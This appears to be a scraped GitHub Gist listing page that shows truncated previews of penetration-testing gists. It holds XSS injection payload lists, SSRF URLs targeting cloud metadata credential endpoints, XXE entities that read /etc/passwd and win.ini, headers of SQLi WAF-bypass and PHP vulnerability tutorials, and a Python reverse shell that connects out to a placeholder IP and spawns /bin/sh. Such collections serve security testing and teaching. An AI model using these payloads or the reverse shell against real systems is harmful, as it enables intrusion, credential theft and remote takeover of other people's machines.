A combination of my own methodology and the Web Application Hacker's Handbook Task checklist, as a Github-Flavored Markdown file
Nasur Ullah Spy0x7
💢
melpomene
/ wordcollector.py
Created
October 11, 2011 11:33
Wordlist generating script that parses websites for words.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2.7 | |
| ''' Creates wordlists from web scraping. BeautifulSoup requierd (pip install beautifulsoup) ''' | |
| import sys | |
| import os | |
| import robotparser | |
| from BeautifulSoup import BeautifulSoup as bs | |
| import urllib2 | |
| from urlparse import urlparse |
xsscx
/ location='javascript:1+{}'
Created
February 1, 2015 02:03
XSS, Cross Site Scripting, Javascript Injection Signatures from XSS.Cx
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| '() {' | |
| document.createElement('img').src='javascript:while(1){}' | |
| '<'s'v'g' o'n'l'o'a'd'='a'l'e'r't'('7')' '>' | |
| (function(a){alert(1)}).call() | |
| {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}} | |
| p'rompt(1) | |
| "(prompt(1))in" | |
| parseInt("prompt",36); | |
| eval((1558153217).toString(36).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41))) | |
| eval(1558153217..toString(36))(1) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "></style><script>a=eval;b=alert;a(b(/ xss fired/.source));</script>'"> | |
| ';alert(/xss fired/)//';alert(/xss fired/)//";alert(/xss fired/)//";alert(/xss fired/)//--></sCRipT>">'><sCRipT>alert(/xss fired/)</sCRipT> | |
| ""});});})'"--></SCRIPT>>'"</style>>'"></title>'"><marquee><h1>'"R3NW4</ | |
| h1>'"</marquee>:;'"><)<SCRIPT>prompt(/xss fired/)</SCRIPT>'"$ | |
| \';alert(String.fromCharCode(88,83,83))//\\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";</SCalert(String.fromCharCode(88String.fromCharCode(88, | |
| 115, 115, 32, 66, 121, 32, 72, 51, 65, 82, 84, 95, 66, 76, 51, 51, 68), | |
| 83, 83))RIPT>\">\'><SCRIPT>alert("xss fired")</SCRIPT> | |
| ';alert(/xss fired)//\';alert(1)//";alert(2)//\";al+ert(3)//--></SCRIPT>">'><SCRIPT>alert(/xss fired/)+</SCRIPT>=&{}");}aler+t(6);function+xss(){//&q=';alert(0)//\';alert(1)//";alert(2)//\";alert+(3)//--></SCRIPT>">'+><SCRIPT>alert(/xss fired/)</SCRIPT>=&{}");}alert(6+);function+xss(){// |
BuffaloWill
/ cloud_metadata.txt
Last active
July 22, 2024 12:50
Cloud Metadata Dictionary useful for SSRF Testing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------- | |
| Basic XXE | |
| -------------------------------- | |
| <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> ]> | |
| <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> | |
| -------------------------------- | |
| Basic XEE | |
| -------------------------------- | |
| <!DOCTYPE data [ |
jhaddix
/ Testing_Checklist.md
Last active
July 9, 2024 19:44
— forked from amotmot/WAHH_Task_Checklist.md
Fast Simple Appsec Testing Checklist
mgeeky
/ sqlmap-tamper-scripts-evaluation.md
Last active
May 17, 2024 12:20
SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF
The below table represents results of tests launched against F5 Big-IP ASM WAF appliance in it's XX version of YY and ZZ version of XY
Below names are to be passed to the --tamper= parameter of sqlmap.
The column Violation Rating represents most dominant rating of topmost 20 Requests observed by F5 in it's Security>>Event Logs:Application:Requests view.
The scale is 0-5.
cyberheartmi9
/ gist:b4a4ff0f691be6b5c866450563258e86
Created
April 4, 2018 08:40
Beyond SQLi: Obfuscate and Bypas
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| |=--------------------------------------------------------------------=| | |
| |=--------------=[ Beyond SQLi: Obfuscate and Bypass ]=---------------=| | |
| |=-------------------------=[ 6 October 2011 ]=-----------------------=| | |
| |=----------------------=[ By CWH Underground ]=--------------------=| | |
| |=--------------------------------------------------------------------=| | |
| ###### | |
| Info | |
| ###### |
cyberheartmi9
/ Finding vulnerabilities in PHP scripts FULL
Created
April 4, 2018 08:54
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Name : Finding vulnerabilities in PHP scripts FULL ( with examples ) | |
| Author : SirGod | |
| Email : sirgod08@gmail.com | |
| Contents : | |
| 1) About | |
| 2) Some stuff | |
| 3) Remote File Inclusion | |
| 3.0 - Basic example | |
| 3.1 - Simple example |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import socket,subprocess,os; | |
| s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); | |
| s.connect(("<my ip address>",2375)); | |
| os.dup2(s.fileno(),0); | |
| os.dup2(s.fileno(),1); | |
| os.dup2(s.fileno(),2); | |
| p=subprocess.call(["/bin/sh","-i"]); |
OlderNewer